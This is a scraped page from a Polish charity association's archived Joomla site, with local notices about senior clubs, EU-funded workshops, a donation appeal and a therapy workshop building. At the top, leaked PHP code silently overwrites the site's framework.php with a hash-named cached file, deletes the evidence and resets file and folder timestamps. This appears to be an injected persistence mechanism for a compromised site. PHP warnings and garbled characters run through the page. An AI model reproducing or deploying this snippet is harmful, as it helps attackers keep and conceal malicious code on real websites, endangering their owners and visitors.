$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }
Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 423

Warning: Cannot modify header information - headers already sent by (output started at /www/pomocnadlon/archiwalna-wersja/includes/framework.php:92) in /www/pomocnadlon/archiwalna-wersja/libraries/joomla/session/session.php on line 426
 

Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Klubu Seniora "Wrzos" -organizuje Śledziówkę
Członkowie Klubu Wrzos zapraszają wszystkich seniorów na śledziówkę . Spotkanie odbędzie się w dniu 08.03.2011 w Sali świetlicowej w obiekcie Rehabilitacji Centrum Medycyny Rodzinnej w Gnojniku.
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Koło Gospodyń Wiejskich - Spotkanie Karnawałowe
Członkinie KGW z Gnojnika zapraszają organizowane serdecznie na spotkanie karnawałowe organizowane w dniu 03.03.2011 w Domu Strażaka od godz. 17,00
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Rozbudowa warsztatu Terapii Zajęciowej w trakcie
rozbudowa wtz IMG 0823W 2011 roku planujemy nadal kontynuować rozbudowę obiektu WTZ w Zawadzie Uszewskiej. Przed zimą udało się dokończyć budowę dachu. Obecnie gromadzimy pieniądze na dalsze prace/ stolarkę okienną ,drzwi, tynki i inne prace wykończeniowe/ „rosną mury „ aż miło popatrzeć. Problemem będzie zdobycie środków na dach. Mamy nadzieję ,że pozyskamy część środków z 1%podatku dochodowego i wspólnymi siłami uda się prace kontynuować Marzeniem naszym jest to , aby część dobudowana była gotowa do użytku do końca roku 2011.
Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Klub Seniora Wrzos  - integracyjne spotkanie międzypokoleniowe
mikolaj P1040261

20 stycznia w obiekcie Rehabilitacji Centrum Medycyny Rodzinnej w Gnojniku odbyło się spotkanie choinkowe- integracyjne . Organizatorami byli członkowie Klubu Seniora „Wrzos”. Na spotkanie zaproszono niepełnosprawne dzieci w wieku 3-14 lat z terenu Gminy Gnojnik i Czchów wraz z rodzicami oraz uczestników Warsztatu Terapii Zajęciowej z Zawady Uszewskiej. Uczestnicy WTZ przedstawili przepiękny spektakl o tematyce Bożonarodzeniowej .W zabawie uczestniczył św. Mikołaj ,który obdarował wszystkie dzieci paczkami , a uczestników WTZ słodyczami.

Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Koło Gospodyń Wiejskich-szansa edukacyjna i społeczna Działanie 9.5
   
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Człowiek – najlepsza inwestycja

„Koło Gospodyń Wiejskich-szansa edukacyjna i społeczna „- Działanie 9.5 Oddolne inicjatywy edukacyjne na obszarach wiejskich.

Uczestniczkami było 20 kobiet z terenu Gnojnika w wieku ponad 18 lat. Uczestniczki należały do najbardziej przedsiębiorczej grupy społeczeństwa wiejskiego. Utworzone zostało Koło Gospodyń Wiejskich , wybrano 5 –cio osobowy Zarząd Koła. Utworzone Koło Gospodyń Wiejskich będzie stwarzało możliwość spotkań , wymiany doświadczeń , poszerzenia wiedzy z różnych dziedzin, nauczenia się czegoś nowego. Wreszcie będzie można miło spędzić czas, oderwać się od domowych obowiązków. Udostępnione przez realizatorów pomieszczenia z zapleczem kuchennym stwarzają taką możliwość. W ramach projektu realizowane były warsztaty z treningu interpersonalnego z elementami doradztwa zawodowego. Stosowana metoda VIT pozwalała na analizowanie swoich zachowań w nagrywanych scenkach, wzmacnianie pozytywnych zachowań. Prowadzący warsztaty wskazywali na te negatywne zachowania , które można zmienić celem poprawy komunikacji między ludzkiej i zapobiegać wystąpieniu różnych konfliktów .Warsztaty uczyły umiejętności współpracy w grupie, umiejętności zachęcania do współpracy innych ,radzenia sobie w różnych sytuacjach ..... W dalszej kolejności benificjentki uczestniczyły w zajęciach z informatyki oraz w kursie pieczenia ciast na każda okazję. Zajęcia były ciekawe. Odbywały się zgodnie z ustalonym harmonogramem , najczęściej dwa razy w tygodniu we wtorki i czwartki w godzinach 16.00-19.00.Miejscem spotkań były sale wykładowe mieszczące się w obiektach Centrum Medycyny Rodzinnej w Gnojniku. Przygotowany urozmaicany poczęstunek pozwalał na zrobienie przerwy w trakcie burzliwych niejednokrotnie dyskusji. Projekt realizowany w okresie 01.06.2010do 30.11.2010

Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego .

 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Klub 50+ Razem łatwiej  Działanie 7.3 Inicjatywy lokalne na rzecz aktywnej integracji
   
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Człowiek – najlepsza inwestycja
. W projekcie uczestniczyło 20 osób osoby ,które ukończyły 50 lat- 17 kobiet i 3 mężczyzn z terenu Gminy Gnojnik. W ramach projektu odbywały się zajęcia z treningu interpersonalnego , z doradztwa zawodowego i informatyki .Zajęcia warsztatowe by ciekawe , prowadzone interesująco. Mobilizowały uczestników spotkań do aktywnego uczestnictwa. Pomagały beneficjentom podnieść poczucie własnej wartości, rozwiązywać problemy dnia codziennego, wymienić doświadczenia. Zajęcia pozwalały również miło spędzić czas wśród rówieśników, zapomnieć o bieżących problemach . Zastosowanie metody VIT z nagrywaniem i odtwarzaniem różnych scenek uatrakcyjniało znacznie warsztaty. Zajęcia z doradztwa zawodowego pozwoliło uczestnikom zaznajomić się z różnymi formami zatrudnienia, nauczyć wypełniania różnych dokumentów, poruszać się na rynku pracy. Podczas zajęć z informatykiem uczono się obsługi komputera, korzystania z zasobów Internetu. Przygotowywany poczęstunek stanowi dobry „przerywnik” w trakcie zajęć. ... Spotkania warsztatowe odbywały się zgodnie z ustalonym harmonogramem, najczęściej 2 razy w tygodniu po 3 godziny. Miejscem realizacji projektu były sale wykładowe mieszczące się w obiektach Centrum Medycyny Rodzinnej w Gnojniku. Projekt realizowany był w okresie 01.06.2010do 30.11.2010 . Został utworzony Klub Seniora i wybrany 3 osobowy Zarząd : Panie Helena Odroń i Barbara Strzesak oraz Pan Władysław Święch. Po zakończeniu projektu Klub Seniora Wrzos będzie kontynuował swoją działalność. Ustalono, że należy w wielu działaniach współpracować z Kołem Gospodyń Wiejskich w Gnojniku . Projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
APEL - Prosimy o wsparcie rodziny Pani Edyty Klimas .
Tragedia tej rodziny rozpoczęła się w listopadzie 2009 roku , kiedy to w wypadku komunikacyjnym / w trakcie pracy /zginął mąż Pani Edyty .Pozostawił trójkę nieletnich dzieci :15, 9 i 3 lata. Czarę goryczy dopełnił dalej los. W styczniu 2010 roku u pani Edyty rozpoznano ciężką chorobę ,wymagającą długiego leczenia , chorobę o poważnym rokowaniu. Matka przebywa w Oddziale Hematologii Krakowskiego szpitala .Dzieci pozostały pod opieka rodziny ,sąsiadów. Apelujemy o pomoc tej rodzinie, o wsparcie materialne ,pieniężne. Potrzeba pieniędzy na leki....
Stowarzyszenie uruchomiło specjalne konto na które można wpłacać pieniądze : 55 9453 0009 0020 0200 0316 0003
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Rozbudowa warsztatu Terapii Zajęciowej
Z największa radością przystąpiliśmy do prac przy rozbudowie WTZ w Zawadzie Uszewskiej. Prace trwają od połowy lipca .Dzięki zaangażowaniu kadry / w tym kierownika WTZ/, uczestników i rodziców oraz innym osobom, które nas wspomagają "rosną mury" aż miło popatrzeć. Problemem będzie zdobycie środków na dach. Korzystamy też ze środków z 1%podatku dochodowego. Mamy nadzieję, że wspólnymi siłami uda się prace kontynuować i obiekt w stanie surowym gotowy będzie jesienią.
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
"Klub 50+ Razem łatwiej"
   
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Człowiek – najlepsza inwestycja
Działanie 7.3 Inicjatywy lokalne na rzecz aktywnej integracji .Uczestnikami zajęć warsztatowych są osoby ,które ukończyły 50 lat- 17 kobiet i 3 mężczyzn z terenu Gminy Gnojnik. Do tej pory odbywały się zajęcia z treningu interpersonalnego .Warsztaty są ciekawe , prowadzone interesująco. Mobilizują uczestników spotkań do aktywnego uczestnictwa. Pomagają beneficjentom podnieść poczucie własnej wartości, pomagają rozwiązywać problemy dnia codziennego, wymienić doświadczenia. Zajęcia pozwalają również miło spędzić czas wśród rówieśników, zapomnieć o problemach dnia codziennego.
Więcej…
 
Warning: in_array() [function.in-array]: Wrong datatype for second argument in /www/pomocnadlon/archiwalna-wersja/plugins/content/fblinkcontentimage.php on line 395
Koło Gospodyń Wiejskich-szansa edukacyjna i społeczna
   
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego
Człowiek – najlepsza inwestycja

Działanie 9.5 Oddolne inicjatywy edukacyjne na obszarach wiejskich. Uczestniczkami jest 20 kobiet z terenu Gnojnika w wieku ponad 18 lat. Uczestniczki należą do najbardziej przedsiębiorczej grupy społeczeństwa wiejskiego. Utworzone zostało Koło Gospodyń Wiejskich , wybrano 5 –cio osobowy. Zarząd. Utworzone Koło Gospodyń Wiejskich będzie stwarzało możliwość spotkań , wymiany doświadczeń , poszerzenia wiedzy z różnych dziedzin, nauczenia się czegoś nowego. Wreszcie będzie można miło spędzić czas, oderwać się od domowych obowiązków. Udostępnione przez realizatorów pomieszczenia z zapleczem kuchennym stwarzają taką możliwość.

Więcej…
 
<< pierwsza < poprzednia 1 2 3 4 następna > ostatnia >>

Strona 3 z 4
Pomagaj razem z nami, moesz przekaza� swoj darowizne za po�rednictwem internetu
Pomoc ofiarom wypadkw komunikacyjnych
Projekty Aktywizujce
Zielone Ochronki
Spartakiady
Warsztaty Terapi Zajciowej w Zawadzie Uszewskiej
 

Copyright © Stowarzyszenie "Pomocna Do"